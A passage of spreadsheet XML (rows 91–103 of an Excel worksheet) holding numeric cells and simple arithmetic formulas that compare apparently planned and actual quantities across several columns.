      <c r="H91" s="89">
        <v>105</v>
      </c>
      <c r="I91" s="89">
        <f>2483.1+25</f>
        <v>2508.1</v>
      </c>
      <c r="J91" s="89">
        <f>209+15</f>
        <v>224</v>
      </c>
      <c r="K91" s="89">
        <f>147.8+14</f>
        <v>161.80000000000001</v>
      </c>
      <c r="L91" s="89">
        <v>4.2</v>
      </c>
      <c r="M91" s="85">
        <v>3659.1</v>
      </c>
      <c r="N91" s="98">
        <f>P91+T91+X91+AB91+AF91+AI91+AL91</f>
        <v>3659.1</v>
      </c>
      <c r="O91" s="86">
        <f t="shared" ref="O91:O93" si="190">R91+V91+Z91+AD91+AG91+AJ91+AM91</f>
        <v>3712.1</v>
      </c>
      <c r="P91" s="11">
        <v>5</v>
      </c>
      <c r="Q91" s="12">
        <v>5</v>
      </c>
      <c r="R91" s="87">
        <v>5</v>
      </c>
      <c r="S91" s="12"/>
      <c r="T91" s="11">
        <v>651</v>
      </c>
      <c r="U91" s="12">
        <v>651</v>
      </c>
      <c r="V91" s="87">
        <v>651</v>
      </c>
      <c r="W91" s="12"/>
      <c r="X91" s="11">
        <v>105</v>
      </c>
      <c r="Y91" s="12">
        <v>105</v>
      </c>
      <c r="Z91" s="87">
        <f>105+20</f>
        <v>125</v>
      </c>
      <c r="AA91" s="12"/>
      <c r="AB91" s="11">
        <f>2477.1+6+25</f>
        <v>2508.1</v>
      </c>
      <c r="AC91" s="12"/>
      <c r="AD91" s="87">
        <f>2483.1+25+AD96</f>
        <v>2541.1</v>
      </c>
      <c r="AE91" s="12"/>
      <c r="AF91" s="11">
        <f>209+15</f>
        <v>224</v>
      </c>
      <c r="AG91" s="87">
        <f>209+15</f>
        <v>224</v>
      </c>
      <c r="AH91" s="12"/>
      <c r="AI91" s="11">
        <f>147.8+14</f>
        <v>161.80000000000001</v>
      </c>
      <c r="AJ91" s="87">
        <f>147.8+14</f>
        <v>161.80000000000001</v>
      </c>
      <c r="AK91" s="12"/>
      <c r="AL91" s="11">
        <v>4.2</v>
      </c>
      <c r="AM91" s="87">
        <v>4.2</v>
      </c>
      <c r="AN91" s="87"/>
      <c r="AO91" s="73">
        <f>O91/N91*100</f>
        <v>101.44844360635128</v>
      </c>
      <c r="AP91" s="74">
        <f>O91-M91</f>
        <v>53</v>
      </c>
      <c r="AQ91" s="91"/>
    </row>
    <row r="92" spans="1:43" ht="22.5" customHeight="1">
      <c r="A92" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B92" s="81" t="s">
        <v>127</v>
      </c>
      <c r="C92" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D92" s="89">
        <v>1799</v>
      </c>
      <c r="E92" s="83">
        <v>1799.1</v>
      </c>
      <c r="F92" s="89">
        <v>0</v>
      </c>
      <c r="G92" s="89">
        <v>205</v>
      </c>
      <c r="H92" s="89">
        <v>0</v>
      </c>
      <c r="I92" s="89">
        <v>1594.1</v>
      </c>
      <c r="J92" s="89">
        <v>0</v>
      </c>
      <c r="K92" s="89">
        <v>0</v>
      </c>
      <c r="L92" s="89">
        <v>0</v>
      </c>
      <c r="M92" s="85">
        <v>1799.1</v>
      </c>
      <c r="N92" s="98">
        <f>P92+T92+X92+AB92+AF92+AI92+AL92</f>
        <v>1799.1</v>
      </c>
      <c r="O92" s="86">
        <f t="shared" si="190"/>
        <v>1797.9299999999998</v>
      </c>
      <c r="P92" s="11">
        <v>0</v>
      </c>
      <c r="Q92" s="12">
        <v>0</v>
      </c>
      <c r="R92" s="87"/>
      <c r="S92" s="12"/>
      <c r="T92" s="11">
        <v>205</v>
      </c>
      <c r="U92" s="12">
        <v>205</v>
      </c>
      <c r="V92" s="87">
        <v>205</v>
      </c>
      <c r="W92" s="12"/>
      <c r="X92" s="11">
        <v>0</v>
      </c>
      <c r="Y92" s="12">
        <v>0</v>
      </c>
      <c r="Z92" s="87">
        <v>0</v>
      </c>
      <c r="AA92" s="12"/>
      <c r="AB92" s="11">
        <v>1594.1</v>
      </c>
      <c r="AC92" s="12"/>
      <c r="AD92" s="87">
        <f>1594.1-1.17</f>
        <v>1592.9299999999998</v>
      </c>
      <c r="AE92" s="12"/>
      <c r="AF92" s="11">
        <v>0</v>
      </c>
      <c r="AG92" s="87">
        <v>0</v>
      </c>
      <c r="AH92" s="12"/>
      <c r="AI92" s="11">
        <v>0</v>
      </c>
      <c r="AJ92" s="87">
        <v>0</v>
      </c>
      <c r="AK92" s="12"/>
      <c r="AL92" s="11">
        <v>0</v>
      </c>
      <c r="AM92" s="87">
        <v>0</v>
      </c>
      <c r="AN92" s="87"/>
      <c r="AO92" s="73">
        <f>O92/N92*100</f>
        <v>99.934967483741872</v>
      </c>
      <c r="AP92" s="74"/>
      <c r="AQ92" s="91"/>
    </row>
    <row r="93" spans="1:43" ht="22.5" customHeight="1">
      <c r="A93" s="68" t="s">
        <v>3</v>
      </c>
      <c r="B93" s="81" t="s">
        <v>83</v>
      </c>
      <c r="C93" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D93" s="89">
        <v>1385</v>
      </c>
      <c r="E93" s="83">
        <v>1784.2</v>
      </c>
      <c r="F93" s="89">
        <v>5</v>
      </c>
      <c r="G93" s="89">
        <v>105</v>
      </c>
      <c r="H93" s="89">
        <v>25</v>
      </c>
      <c r="I93" s="89">
        <v>1050</v>
      </c>
      <c r="J93" s="89">
        <v>180</v>
      </c>
      <c r="K93" s="89">
        <v>52</v>
      </c>
      <c r="L93" s="89">
        <v>4.2</v>
      </c>
      <c r="M93" s="85">
        <v>1421.2</v>
      </c>
      <c r="N93" s="98">
        <f>P93+T93+X93+AB93+AF93+AI93+AL93</f>
        <v>3086.1</v>
      </c>
      <c r="O93" s="86">
        <f t="shared" si="190"/>
        <v>3086.1</v>
      </c>
      <c r="P93" s="11">
        <v>5</v>
      </c>
      <c r="Q93" s="12">
        <v>5</v>
      </c>
      <c r="R93" s="87">
        <v>5</v>
      </c>
      <c r="S93" s="12"/>
      <c r="T93" s="11">
        <v>480</v>
      </c>
      <c r="U93" s="12">
        <v>105</v>
      </c>
      <c r="V93" s="87">
        <v>480</v>
      </c>
      <c r="W93" s="12"/>
      <c r="X93" s="11">
        <v>85</v>
      </c>
      <c r="Y93" s="12">
        <v>25</v>
      </c>
      <c r="Z93" s="87">
        <v>85</v>
      </c>
      <c r="AA93" s="12"/>
      <c r="AB93" s="11">
        <f>2200-8.1</f>
        <v>2191.9</v>
      </c>
      <c r="AC93" s="12"/>
      <c r="AD93" s="87">
        <v>2191.9</v>
      </c>
      <c r="AE93" s="12"/>
      <c r="AF93" s="11">
        <v>200</v>
      </c>
      <c r="AG93" s="87">
        <v>200</v>
      </c>
      <c r="AH93" s="12"/>
      <c r="AI93" s="11">
        <v>120</v>
      </c>
      <c r="AJ93" s="87">
        <v>120</v>
      </c>
      <c r="AK93" s="12"/>
      <c r="AL93" s="11">
        <v>4.2</v>
      </c>
      <c r="AM93" s="87">
        <v>4.2</v>
      </c>
      <c r="AN93" s="87"/>
      <c r="AO93" s="73">
        <f>O93/N93*100</f>
        <v>100</v>
      </c>
      <c r="AP93" s="74"/>
      <c r="AQ93" s="91"/>
    </row>
    <row r="94" spans="1:43" ht="22.5" customHeight="1">
      <c r="A94" s="68" t="s">
        <v>35</v>
      </c>
      <c r="B94" s="81" t="s">
        <v>11</v>
      </c>
      <c r="C94" s="25" t="s">
        <v>2</v>
      </c>
      <c r="D94" s="89">
        <v>15</v>
      </c>
      <c r="E94" s="83">
        <f>E95/E93*10</f>
        <v>15</v>
      </c>
      <c r="F94" s="89">
        <v>15</v>
      </c>
      <c r="G94" s="89">
        <v>15.2</v>
      </c>
      <c r="H94" s="89">
        <v>15.2</v>
      </c>
      <c r="I94" s="89">
        <v>15.2</v>
      </c>
      <c r="J94" s="89">
        <v>15.2</v>
      </c>
      <c r="K94" s="89">
        <v>15</v>
      </c>
      <c r="L94" s="89">
        <v>15</v>
      </c>
      <c r="M94" s="90">
        <f>M95/M93*10</f>
        <v>15.191387559808611</v>
      </c>
      <c r="N94" s="98">
        <f>N95/N93*10</f>
        <v>2.4302517740837953E-2</v>
      </c>
      <c r="O94" s="86">
        <f>O95/O93*10</f>
        <v>0</v>
      </c>
      <c r="P94" s="11">
        <v>15</v>
      </c>
      <c r="Q94" s="12">
        <v>15</v>
      </c>
      <c r="R94" s="87"/>
      <c r="S94" s="12"/>
      <c r="T94" s="11"/>
      <c r="U94" s="12"/>
      <c r="V94" s="87"/>
      <c r="W94" s="12"/>
      <c r="X94" s="11"/>
      <c r="Y94" s="12"/>
      <c r="Z94" s="87"/>
      <c r="AA94" s="12"/>
      <c r="AB94" s="11"/>
      <c r="AC94" s="12"/>
      <c r="AD94" s="87"/>
      <c r="AE94" s="12"/>
      <c r="AF94" s="11"/>
      <c r="AG94" s="87"/>
      <c r="AH94" s="12"/>
      <c r="AI94" s="11"/>
      <c r="AJ94" s="87"/>
      <c r="AK94" s="12"/>
      <c r="AL94" s="11"/>
      <c r="AM94" s="87"/>
      <c r="AN94" s="87"/>
      <c r="AO94" s="87"/>
      <c r="AP94" s="74"/>
      <c r="AQ94" s="91"/>
    </row>
    <row r="95" spans="1:43" ht="22.5" customHeight="1">
      <c r="A95" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B95" s="81" t="s">
        <v>12</v>
      </c>
      <c r="C95" s="25" t="s">
        <v>36</v>
      </c>
      <c r="D95" s="89">
        <v>2105</v>
      </c>
      <c r="E95" s="83">
        <v>2676.3</v>
      </c>
      <c r="F95" s="89">
        <f t="shared" ref="F95:L95" si="191">F94*F93/10</f>
        <v>7.5</v>
      </c>
      <c r="G95" s="89">
        <f t="shared" si="191"/>
        <v>159.6</v>
      </c>
      <c r="H95" s="89">
        <f t="shared" si="191"/>
        <v>38</v>
      </c>
      <c r="I95" s="89">
        <f t="shared" si="191"/>
        <v>1596</v>
      </c>
      <c r="J95" s="89">
        <f t="shared" si="191"/>
        <v>273.60000000000002</v>
      </c>
      <c r="K95" s="89">
        <f t="shared" si="191"/>
        <v>78</v>
      </c>
      <c r="L95" s="89">
        <f t="shared" si="191"/>
        <v>6.3</v>
      </c>
      <c r="M95" s="85">
        <v>2159</v>
      </c>
      <c r="N95" s="98">
        <f>P95+T95+X95+AB95+AF95+AI95+AL95</f>
        <v>7.5</v>
      </c>
      <c r="O95" s="86">
        <f>R95+V95+Z95+AD95+AG95+AJ95+AM95</f>
        <v>0</v>
      </c>
      <c r="P95" s="11">
        <f t="shared" ref="P95" si="192">P94*P93/10</f>
        <v>7.5</v>
      </c>
      <c r="Q95" s="12">
        <v>7.5</v>
      </c>
      <c r="R95" s="87"/>
      <c r="S95" s="12"/>
      <c r="T95" s="11"/>
      <c r="U95" s="12"/>
      <c r="V95" s="87"/>
      <c r="W95" s="12"/>
      <c r="X95" s="11"/>
      <c r="Y95" s="12"/>
      <c r="Z95" s="87"/>
      <c r="AA95" s="12"/>
      <c r="AB95" s="11"/>
      <c r="AC95" s="12"/>
      <c r="AD95" s="87"/>
      <c r="AE95" s="12"/>
      <c r="AF95" s="11"/>
      <c r="AG95" s="87"/>
      <c r="AH95" s="12"/>
      <c r="AI95" s="11"/>
      <c r="AJ95" s="87"/>
      <c r="AK95" s="12"/>
      <c r="AL95" s="11"/>
      <c r="AM95" s="87"/>
      <c r="AN95" s="87"/>
      <c r="AO95" s="87"/>
      <c r="AP95" s="74"/>
      <c r="AQ95" s="91"/>
    </row>
    <row r="96" spans="1:43" ht="22.5" customHeight="1">
      <c r="A96" s="68"/>
      <c r="B96" s="101" t="s">
        <v>71</v>
      </c>
      <c r="C96" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D96" s="89"/>
      <c r="E96" s="83"/>
      <c r="F96" s="89"/>
      <c r="G96" s="89"/>
      <c r="H96" s="89"/>
      <c r="I96" s="89">
        <v>25</v>
      </c>
      <c r="J96" s="89">
        <v>15</v>
      </c>
      <c r="K96" s="89">
        <v>14</v>
      </c>
      <c r="L96" s="89"/>
      <c r="M96" s="85">
        <v>54</v>
      </c>
      <c r="N96" s="98"/>
      <c r="O96" s="86">
        <f>SUM(R96+V96+Z96+AD96+AG96+AJ96+AM96)</f>
        <v>53</v>
      </c>
      <c r="P96" s="11"/>
      <c r="Q96" s="12"/>
      <c r="R96" s="87"/>
      <c r="S96" s="12"/>
      <c r="T96" s="11"/>
      <c r="U96" s="12"/>
      <c r="V96" s="87"/>
      <c r="W96" s="12"/>
      <c r="X96" s="11"/>
      <c r="Y96" s="12"/>
      <c r="Z96" s="87">
        <v>20</v>
      </c>
      <c r="AA96" s="12"/>
      <c r="AB96" s="11"/>
      <c r="AC96" s="12"/>
      <c r="AD96" s="87">
        <v>33</v>
      </c>
      <c r="AE96" s="12"/>
      <c r="AF96" s="11"/>
      <c r="AG96" s="87"/>
      <c r="AH96" s="12"/>
      <c r="AI96" s="11"/>
      <c r="AJ96" s="87"/>
      <c r="AK96" s="12"/>
      <c r="AL96" s="11"/>
      <c r="AM96" s="87"/>
      <c r="AN96" s="87"/>
      <c r="AO96" s="87"/>
      <c r="AP96" s="74"/>
      <c r="AQ96" s="91"/>
    </row>
    <row r="97" spans="1:43" s="197" customFormat="1" ht="22.5" customHeight="1">
      <c r="A97" s="92">
        <v>4</v>
      </c>
      <c r="B97" s="93" t="s">
        <v>102</v>
      </c>
      <c r="C97" s="115" t="s">
        <v>39</v>
      </c>
      <c r="D97" s="116">
        <v>1021</v>
      </c>
      <c r="E97" s="71">
        <f>E98+E99</f>
        <v>1225.9000000000001</v>
      </c>
      <c r="F97" s="70">
        <f t="shared" ref="F97:L97" si="193">F98+F99</f>
        <v>93.3</v>
      </c>
      <c r="G97" s="116">
        <f t="shared" si="193"/>
        <v>77.42</v>
      </c>
      <c r="H97" s="116">
        <f t="shared" si="193"/>
        <v>607.20000000000005</v>
      </c>
      <c r="I97" s="116">
        <f t="shared" si="193"/>
        <v>142.69999999999999</v>
      </c>
      <c r="J97" s="116">
        <f t="shared" si="193"/>
        <v>118</v>
      </c>
      <c r="K97" s="116">
        <f t="shared" si="193"/>
        <v>105.80000000000001</v>
      </c>
      <c r="L97" s="116">
        <f t="shared" si="193"/>
        <v>86.8</v>
      </c>
      <c r="M97" s="117">
        <v>1231.22</v>
      </c>
      <c r="N97" s="118">
        <f>N98+N99</f>
        <v>1401.22</v>
      </c>
      <c r="O97" s="73">
        <f>O98+O99</f>
        <v>1376.5900000000001</v>
      </c>
      <c r="P97" s="73">
        <f>P98+P99</f>
        <v>108.3</v>
      </c>
      <c r="Q97" s="73">
        <v>93.3</v>
      </c>
      <c r="R97" s="79">
        <f t="shared" ref="R97" si="194">R98+R99</f>
        <v>108.3</v>
      </c>
      <c r="S97" s="33"/>
      <c r="T97" s="73">
        <f>T98+T99</f>
        <v>104.42</v>
      </c>
      <c r="U97" s="73">
        <v>77.42</v>
      </c>
      <c r="V97" s="119">
        <f t="shared" ref="V97" si="195">V98+V99</f>
        <v>94.42</v>
      </c>
      <c r="W97" s="119"/>
      <c r="X97" s="73">
        <f>X98+X99</f>
        <v>633.20000000000005</v>
      </c>
      <c r="Y97" s="73">
        <v>607.20000000000005</v>
      </c>
      <c r="Z97" s="119">
        <f t="shared" ref="Z97" si="196">Z98+Z99</f>
        <v>623.20000000000005</v>
      </c>
      <c r="AA97" s="119"/>
      <c r="AB97" s="73">
        <f>AB98+AB99</f>
        <v>175.7</v>
      </c>
      <c r="AC97" s="73"/>
      <c r="AD97" s="119">
        <f t="shared" ref="AD97" si="197">AD98+AD99</f>
        <v>168.92999999999998</v>
      </c>
      <c r="AE97" s="119"/>
      <c r="AF97" s="73">
        <f>AF98+AF99</f>
        <v>147</v>
      </c>
      <c r="AG97" s="119">
        <f t="shared" ref="AG97" si="198">AG98+AG99</f>
        <v>140.03</v>
      </c>
      <c r="AH97" s="119">
        <f>AG97-J97</f>
        <v>22.03</v>
      </c>
      <c r="AI97" s="73">
        <f>AI98+AI99</f>
        <v>124.80000000000001</v>
      </c>
      <c r="AJ97" s="119">
        <f t="shared" ref="AJ97" si="199">AJ98+AJ99</f>
        <v>126.9</v>
      </c>
      <c r="AK97" s="119">
        <f>AJ97-K97</f>
        <v>21.099999999999994</v>
      </c>
      <c r="AL97" s="73">
        <f>AL98+AL99</f>
        <v>107.8</v>
      </c>
      <c r="AM97" s="119">
        <f t="shared" ref="AM97" si="200">AM98+AM99</f>
        <v>114.81</v>
      </c>
      <c r="AN97" s="119"/>
      <c r="AO97" s="73">
        <f>O97/N97*100</f>
        <v>98.242246042734195</v>
      </c>
      <c r="AP97" s="74">
        <f>O97-M97</f>
        <v>145.37000000000012</v>
      </c>
      <c r="AQ97" s="120"/>
    </row>
    <row r="98" spans="1:43" ht="22.5" customHeight="1">
      <c r="A98" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B98" s="81" t="s">
        <v>103</v>
      </c>
      <c r="C98" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D98" s="89">
        <v>610</v>
      </c>
      <c r="E98" s="83">
        <v>1020.9000000000002</v>
      </c>
      <c r="F98" s="89">
        <v>81.099999999999994</v>
      </c>
      <c r="G98" s="121">
        <v>60.32</v>
      </c>
      <c r="H98" s="121">
        <v>496.5</v>
      </c>
      <c r="I98" s="121">
        <v>121.2</v>
      </c>
      <c r="J98" s="121">
        <v>97.5</v>
      </c>
      <c r="K98" s="121">
        <v>92.68</v>
      </c>
      <c r="L98" s="121">
        <v>71.599999999999994</v>
      </c>
      <c r="M98" s="122">
        <v>1020.9</v>
      </c>
      <c r="N98" s="98">
        <f>P98+T98+X98+AB98+AF98+AI98+AL98</f>
        <v>1231.22</v>
      </c>
      <c r="O98" s="86">
        <f>R98+V98+Z98+AD98+AG98+AJ98+AM98</f>
        <v>1231.22</v>
      </c>
      <c r="P98" s="87">
        <f>81.1+12.2</f>
        <v>93.3</v>
      </c>
      <c r="Q98" s="87">
        <v>81.099999999999994</v>
      </c>
      <c r="R98" s="87">
        <f>P98</f>
        <v>93.3</v>
      </c>
      <c r="S98" s="87"/>
      <c r="T98" s="87">
        <f>60.32+17.1</f>
        <v>77.42</v>
      </c>
      <c r="U98" s="12">
        <v>60.32</v>
      </c>
      <c r="V98" s="11">
        <f>T98</f>
        <v>77.42</v>
      </c>
      <c r="W98" s="12"/>
      <c r="X98" s="87">
        <f>496.5+20.7+90</f>
        <v>607.20000000000005</v>
      </c>
      <c r="Y98" s="12">
        <v>496.5</v>
      </c>
      <c r="Z98" s="11">
        <f>X98</f>
        <v>607.20000000000005</v>
      </c>
      <c r="AA98" s="12"/>
      <c r="AB98" s="87">
        <f>121.2+21.5</f>
        <v>142.69999999999999</v>
      </c>
      <c r="AC98" s="12"/>
      <c r="AD98" s="11">
        <f>AB98</f>
        <v>142.69999999999999</v>
      </c>
      <c r="AE98" s="12"/>
      <c r="AF98" s="87">
        <f>97.5+20.5</f>
        <v>118</v>
      </c>
      <c r="AG98" s="11">
        <f>AF98</f>
        <v>118</v>
      </c>
      <c r="AH98" s="12"/>
      <c r="AI98" s="87">
        <f>92.68+13.12</f>
        <v>105.80000000000001</v>
      </c>
      <c r="AJ98" s="11">
        <f>AI98</f>
        <v>105.80000000000001</v>
      </c>
      <c r="AK98" s="12"/>
      <c r="AL98" s="87">
        <f>71.6+15.2</f>
        <v>86.8</v>
      </c>
      <c r="AM98" s="11">
        <f>AL98</f>
        <v>86.8</v>
      </c>
      <c r="AN98" s="12"/>
      <c r="AO98" s="73">
        <f>O98/N98*100</f>
        <v>100</v>
      </c>
      <c r="AP98" s="74">
        <f>O98-M98</f>
        <v>210.32000000000005</v>
      </c>
      <c r="AQ98" s="123"/>
    </row>
    <row r="99" spans="1:43" ht="22.5" customHeight="1">
      <c r="A99" s="76" t="s">
        <v>34</v>
      </c>
      <c r="B99" s="24" t="s">
        <v>124</v>
      </c>
      <c r="C99" s="69" t="s">
        <v>1</v>
      </c>
      <c r="D99" s="70">
        <v>410.9</v>
      </c>
      <c r="E99" s="71">
        <f>E100+E101</f>
        <v>205</v>
      </c>
      <c r="F99" s="70">
        <f t="shared" ref="F99:L99" si="201">F100+F101</f>
        <v>12.2</v>
      </c>
      <c r="G99" s="70">
        <f t="shared" si="201"/>
        <v>17.100000000000001</v>
      </c>
      <c r="H99" s="70">
        <f t="shared" si="201"/>
        <v>110.7</v>
      </c>
      <c r="I99" s="70">
        <f t="shared" si="201"/>
        <v>21.5</v>
      </c>
      <c r="J99" s="70">
        <f t="shared" si="201"/>
        <v>20.5</v>
      </c>
      <c r="K99" s="70">
        <f t="shared" si="201"/>
        <v>13.12</v>
      </c>
      <c r="L99" s="70">
        <f t="shared" si="201"/>
        <v>15.2</v>
      </c>
      <c r="M99" s="124">
        <v>210.32</v>
      </c>
      <c r="N99" s="78">
        <f>N102+N103+N104+N105</f>
        <v>170</v>
      </c>
      <c r="O99" s="73">
        <f>O102+O103+O104+O105</f>
        <v>145.37</v>
      </c>
      <c r="P99" s="73">
        <f>P102+P103+P104+P105</f>
        <v>15</v>
      </c>
      <c r="Q99" s="73">
        <v>12.2</v>
      </c>
      <c r="R99" s="73">
        <f t="shared" ref="R99:AM99" si="202">R102+R103+R104+R105</f>
        <v>15</v>
      </c>
      <c r="S99" s="73"/>
      <c r="T99" s="73">
        <f t="shared" si="202"/>
        <v>27</v>
      </c>
      <c r="U99" s="73">
        <v>17.100000000000001</v>
      </c>
      <c r="V99" s="73">
        <f t="shared" si="202"/>
        <v>17</v>
      </c>
      <c r="W99" s="73"/>
      <c r="X99" s="73">
        <f t="shared" si="202"/>
        <v>26</v>
      </c>
      <c r="Y99" s="73">
        <v>110.7</v>
      </c>
      <c r="Z99" s="73">
        <f t="shared" si="202"/>
        <v>16</v>
      </c>
      <c r="AA99" s="73"/>
      <c r="AB99" s="73">
        <f t="shared" si="202"/>
        <v>33</v>
      </c>
      <c r="AC99" s="73"/>
      <c r="AD99" s="73">
        <f t="shared" si="202"/>
        <v>26.23</v>
      </c>
      <c r="AE99" s="73"/>
      <c r="AF99" s="73">
        <f t="shared" si="202"/>
        <v>29</v>
      </c>
      <c r="AG99" s="73">
        <f t="shared" si="202"/>
        <v>22.03</v>
      </c>
      <c r="AH99" s="73"/>
      <c r="AI99" s="73">
        <f t="shared" si="202"/>
        <v>19</v>
      </c>
      <c r="AJ99" s="73">
        <f t="shared" si="202"/>
        <v>21.1</v>
      </c>
      <c r="AK99" s="73"/>
      <c r="AL99" s="73">
        <f t="shared" si="202"/>
        <v>21</v>
      </c>
      <c r="AM99" s="73">
        <f t="shared" si="202"/>
        <v>28.009999999999998</v>
      </c>
      <c r="AN99" s="73"/>
      <c r="AO99" s="73">
        <f>O99/N99*100</f>
        <v>85.511764705882356</v>
      </c>
      <c r="AP99" s="74"/>
      <c r="AQ99" s="80"/>
    </row>
    <row r="100" spans="1:43" ht="22.5" hidden="1" customHeight="1">
      <c r="A100" s="125" t="s">
        <v>115</v>
      </c>
      <c r="B100" s="101" t="s">
        <v>126</v>
      </c>
      <c r="C100" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D100" s="104">
        <v>170.9</v>
      </c>
      <c r="E100" s="83">
        <v>115</v>
      </c>
      <c r="F100" s="104">
        <v>12.2</v>
      </c>
      <c r="G100" s="104">
        <v>17.100000000000001</v>
      </c>
      <c r="H100" s="104">
        <v>20.7</v>
      </c>
      <c r="I100" s="104">
        <v>21.5</v>
      </c>
      <c r="J100" s="104">
        <v>20.5</v>
      </c>
      <c r="K100" s="104">
        <v>13.12</v>
      </c>
      <c r="L100" s="104">
        <v>15.2</v>
      </c>
      <c r="M100" s="105">
        <v>15.191387559808611</v>
      </c>
      <c r="N100" s="196"/>
      <c r="O100" s="86">
        <f>AM100+AJ100+AG100+AD100+Z100+R100+R100</f>
        <v>143.37</v>
      </c>
      <c r="P100" s="86"/>
      <c r="Q100" s="86">
        <v>12.2</v>
      </c>
      <c r="R100" s="106">
        <f>SUM(R102:R105)</f>
        <v>15</v>
      </c>
      <c r="S100" s="106"/>
      <c r="T100" s="106">
        <f t="shared" ref="T100:AM100" si="203">SUM(T102:T105)</f>
        <v>27</v>
      </c>
      <c r="U100" s="106">
        <v>17.100000000000001</v>
      </c>
      <c r="V100" s="106">
        <f t="shared" si="203"/>
        <v>17</v>
      </c>
      <c r="W100" s="106"/>
      <c r="X100" s="106">
        <f t="shared" si="203"/>
        <v>26</v>
      </c>
      <c r="Y100" s="106">
        <v>20.7</v>
      </c>
      <c r="Z100" s="106">
        <f t="shared" si="203"/>
        <v>16</v>
      </c>
      <c r="AA100" s="106"/>
      <c r="AB100" s="106">
        <f t="shared" si="203"/>
        <v>33</v>
      </c>
      <c r="AC100" s="106"/>
      <c r="AD100" s="106">
        <f t="shared" si="203"/>
        <v>26.23</v>
      </c>
      <c r="AE100" s="106"/>
      <c r="AF100" s="106">
        <f t="shared" si="203"/>
        <v>29</v>
      </c>
      <c r="AG100" s="106">
        <f t="shared" si="203"/>
        <v>22.03</v>
      </c>
      <c r="AH100" s="106"/>
      <c r="AI100" s="106">
        <f t="shared" si="203"/>
        <v>19</v>
      </c>
      <c r="AJ100" s="106">
        <f t="shared" si="203"/>
        <v>21.1</v>
      </c>
      <c r="AK100" s="106"/>
      <c r="AL100" s="106">
        <f t="shared" si="203"/>
        <v>21</v>
      </c>
      <c r="AM100" s="106">
        <f t="shared" si="203"/>
        <v>28.009999999999998</v>
      </c>
      <c r="AN100" s="106"/>
      <c r="AO100" s="73"/>
      <c r="AP100" s="74">
        <f t="shared" ref="AP100:AP114" si="204">O100-M100</f>
        <v>128.17861244019139</v>
      </c>
      <c r="AQ100" s="107"/>
    </row>
    <row r="101" spans="1:43" ht="22.5" hidden="1" customHeight="1">
      <c r="A101" s="125" t="s">
        <v>115</v>
      </c>
      <c r="B101" s="101" t="s">
        <v>125</v>
      </c>
      <c r="C101" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D101" s="104">
        <v>240</v>
      </c>
      <c r="E101" s="83">
        <v>90</v>
      </c>
      <c r="F101" s="104"/>
      <c r="G101" s="104">
        <v>0</v>
      </c>
      <c r="H101" s="104">
        <v>90</v>
      </c>
      <c r="I101" s="104"/>
      <c r="J101" s="104">
        <v>0</v>
      </c>
      <c r="K101" s="104"/>
      <c r="L101" s="104"/>
      <c r="M101" s="105">
        <v>2159</v>
      </c>
      <c r="N101" s="196"/>
      <c r="O101" s="86">
        <f>AM101+AJ101+AG101+AD101+Z101+R101+R101</f>
        <v>0</v>
      </c>
      <c r="P101" s="86"/>
      <c r="Q101" s="86"/>
      <c r="R101" s="106"/>
      <c r="S101" s="106"/>
      <c r="T101" s="86"/>
      <c r="U101" s="86">
        <v>0</v>
      </c>
      <c r="V101" s="106"/>
      <c r="W101" s="106"/>
      <c r="X101" s="86"/>
      <c r="Y101" s="86">
        <v>90</v>
      </c>
      <c r="Z101" s="106"/>
      <c r="AA101" s="106"/>
      <c r="AB101" s="86"/>
      <c r="AC101" s="86"/>
      <c r="AD101" s="106"/>
      <c r="AE101" s="106"/>
      <c r="AF101" s="86"/>
      <c r="AG101" s="106"/>
      <c r="AH101" s="106"/>
      <c r="AI101" s="86"/>
      <c r="AJ101" s="106"/>
      <c r="AK101" s="106"/>
      <c r="AL101" s="86"/>
      <c r="AM101" s="106"/>
      <c r="AN101" s="106"/>
      <c r="AO101" s="73"/>
      <c r="AP101" s="74">
        <f t="shared" si="204"/>
        <v>-2159</v>
      </c>
      <c r="AQ101" s="107"/>
    </row>
    <row r="102" spans="1:43" ht="22.5" customHeight="1">
      <c r="A102" s="43" t="s">
        <v>148</v>
      </c>
      <c r="B102" s="44" t="s">
        <v>149</v>
      </c>
      <c r="C102" s="25"/>
      <c r="D102" s="104"/>
      <c r="E102" s="83"/>
      <c r="F102" s="104"/>
      <c r="G102" s="104"/>
      <c r="H102" s="104"/>
      <c r="I102" s="104"/>
      <c r="J102" s="104"/>
      <c r="K102" s="104"/>
      <c r="L102" s="104"/>
      <c r="M102" s="105"/>
      <c r="N102" s="196">
        <f>P102+T102+X102+AB102+AF102+AI102+AL102</f>
        <v>50</v>
      </c>
      <c r="O102" s="86">
        <f>AM102+AJ102+AG102+AD102+Z102+R102+V102</f>
        <v>59.39</v>
      </c>
      <c r="P102" s="40">
        <v>8</v>
      </c>
      <c r="Q102" s="41"/>
      <c r="R102" s="106">
        <v>8</v>
      </c>
      <c r="S102" s="39"/>
      <c r="T102" s="40">
        <v>8</v>
      </c>
      <c r="U102" s="41"/>
      <c r="V102" s="106">
        <v>8</v>
      </c>
      <c r="W102" s="39"/>
      <c r="X102" s="40">
        <v>8</v>
      </c>
      <c r="Y102" s="41"/>
      <c r="Z102" s="106">
        <v>8</v>
      </c>
      <c r="AA102" s="39"/>
      <c r="AB102" s="40">
        <v>8</v>
      </c>
      <c r="AC102" s="41"/>
      <c r="AD102" s="106">
        <v>10.3</v>
      </c>
      <c r="AE102" s="39"/>
      <c r="AF102" s="40">
        <v>8</v>
      </c>
      <c r="AG102" s="106">
        <v>8</v>
      </c>
      <c r="AH102" s="39"/>
      <c r="AI102" s="40">
        <v>4</v>
      </c>
      <c r="AJ102" s="106">
        <v>4.5</v>
      </c>
      <c r="AK102" s="39"/>
      <c r="AL102" s="40">
        <v>6</v>
      </c>
      <c r="AM102" s="106">
        <v>12.59</v>
      </c>
      <c r="AN102" s="106"/>
      <c r="AO102" s="73">
        <f>O102/N102*100</f>
        <v>118.78</v>
      </c>
      <c r="AP102" s="74">
        <f t="shared" si="204"/>
        <v>59.39</v>
      </c>
      <c r="AQ102" s="107"/>
    </row>
    <row r="103" spans="1:43" ht="22.5" customHeight="1">
      <c r="A103" s="43" t="s">
        <v>148</v>
      </c>
      <c r="B103" s="44" t="s">
        <v>150</v>
      </c>
